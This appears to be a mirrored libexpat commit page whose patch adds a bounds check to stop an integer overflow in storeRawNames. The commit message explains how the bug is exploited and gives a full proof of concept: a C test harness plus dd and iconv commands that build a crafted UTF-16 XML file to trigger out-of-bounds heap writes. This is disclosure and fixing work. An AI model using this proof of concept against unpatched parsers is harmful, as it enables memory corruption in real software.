mirror of
https://github.com/libexpat/libexpat.git
synced 2025-04-15 00:38:15 +00:00
Prevent integer overflow in storeRawNames
It is possible to use an integer overflow in storeRawNames for out of boundary heap writes. Default configuration is affected. If compiled with XML_UNICODE then the attack does not work. Compiling with -fsanitize=address confirms the following proof of concept. The problem can be exploited by abusing the m_buffer expansion logic. Even though the initial size of m_buffer is a power of two, eventually it can end up a little bit lower, thus allowing allocations very close to INT_MAX (since INT_MAX/2 can be surpassed). This means that tag names can be parsed which are almost INT_MAX in size. Unfortunately (from an attacker point of view) INT_MAX/2 is also a limitation in string pools. Having a tag name of INT_MAX/2 characters or more is not possible. Expat can convert between different encodings. UTF-16 documents which contain only ASCII representable characters are twice as large as their ASCII encoded counter-parts. The proof of concept works by taking these three considerations into account: 1. Move the m_buffer size slightly below a power of two by having a short root node <a>. This allows the m_buffer to grow very close to INT_MAX. 2. The string pooling forbids tag names longer than or equal to INT_MAX/2, so keep the attack tag name smaller than that. 3. To be able to still overflow INT_MAX even though the name is limited at INT_MAX/2-1 (nul byte) we use UTF-16 encoding and a tag which only contains ASCII characters. UTF-16 always stores two bytes per character while the tag name is converted to using only one. Our attack node byte count must be a bit higher than 2/3 INT_MAX so the converted tag name is around INT_MAX/3 which in sum can overflow INT_MAX. Thanks to our small root node, m_buffer can handle 2/3 INT_MAX bytes without running into INT_MAX boundary check. The string pooling is able to store INT_MAX/3 as tag name because the amount is below INT_MAX/2 limitation. And creating the sum of both eventually overflows in storeRawNames. Proof of Concept: 1. Compile expat with -fsanitize=address. 2. Create Proof of Concept binary which iterates through input file 16 MB at once for better performance and easier integer calculations: ``` cat > poc.c << EOF #include <err.h> #include <expat.h> #include <stdlib.h> #include <stdio.h> #define CHUNK (16 * 1024 * 1024) int main(int argc, char *argv[]) { XML_Parser parser; FILE *fp; char *buf; int i; if (argc != 2) errx(1, "usage: poc file.xml"); if ((parser = XML_ParserCreate(NULL)) == NULL) errx(1, "failed to create expat parser"); if ((fp = fopen(argv[1], "r")) == NULL) { XML_ParserFree(parser); err(1, "failed to open file"); } if ((buf = malloc(CHUNK)) == NULL) { fclose(fp); XML_ParserFree(parser); err(1, "failed to allocate buffer"); } i = 0; while (fread(buf, CHUNK, 1, fp) == 1) { printf("iteration %d: XML_Parse returns %d\n", ++i, XML_Parse(parser, buf, CHUNK, XML_FALSE)); } free(buf); fclose(fp); XML_ParserFree(parser); return 0; } EOF gcc -fsanitize=address -lexpat -o poc poc.c ``` 3. Construct specially prepared UTF-16 XML file: ``` dd if=/dev/zero bs=1024 count=794624 | tr '\0' 'a' > poc-utf8.xml echo -n '<a><' | dd conv=notrunc of=poc-utf8.xml echo -n '><' | dd conv=notrunc of=poc-utf8.xml bs=1 seek=805306368 iconv -f UTF-8 -t UTF-16LE poc-utf8.xml > poc-utf16.xml ``` 4. Run proof of concept: ``` ./poc poc-utf16.xml ```
This commit is contained in:
parent
81b89678e2
commit
eb0362808b
1 changed files with 6 additions and 1 deletions
|
@ -2563,6 +2563,7 @@ storeRawNames(XML_Parser parser) {
|
|||
while (tag) {
|
||||
int bufSize;
|
||||
int nameLen = sizeof(XML_Char) * (tag->name.strLen + 1);
|
||||
size_t rawNameLen;
|
||||
char *rawNameBuf = tag->buf + nameLen;
|
||||
/* Stop if already stored. Since m_tagStack is a stack, we can stop
|
||||
at the first entry that has already been copied; everything
|
||||
|
@ -2574,7 +2575,11 @@ storeRawNames(XML_Parser parser) {
|
|||
/* For re-use purposes we need to ensure that the
|
||||
size of tag->buf is a multiple of sizeof(XML_Char).
|
||||
*/
|
||||
bufSize = nameLen + ROUND_UP(tag->rawNameLength, sizeof(XML_Char));
|
||||
rawNameLen = ROUND_UP(tag->rawNameLength, sizeof(XML_Char));
|
||||
/* Detect and prevent integer overflow. */
|
||||
if (rawNameLen > (size_t)INT_MAX - nameLen)
|
||||
return XML_FALSE;
|
||||
bufSize = nameLen + (int)rawNameLen;
|
||||
if (bufSize > tag->bufEnd - tag->buf) {
|
||||
char *temp = (char *)REALLOC(parser, tag->buf, bufSize);
|
||||
if (temp == NULL)
|
||||
|
|
Loading…
Add table
Reference in a new issue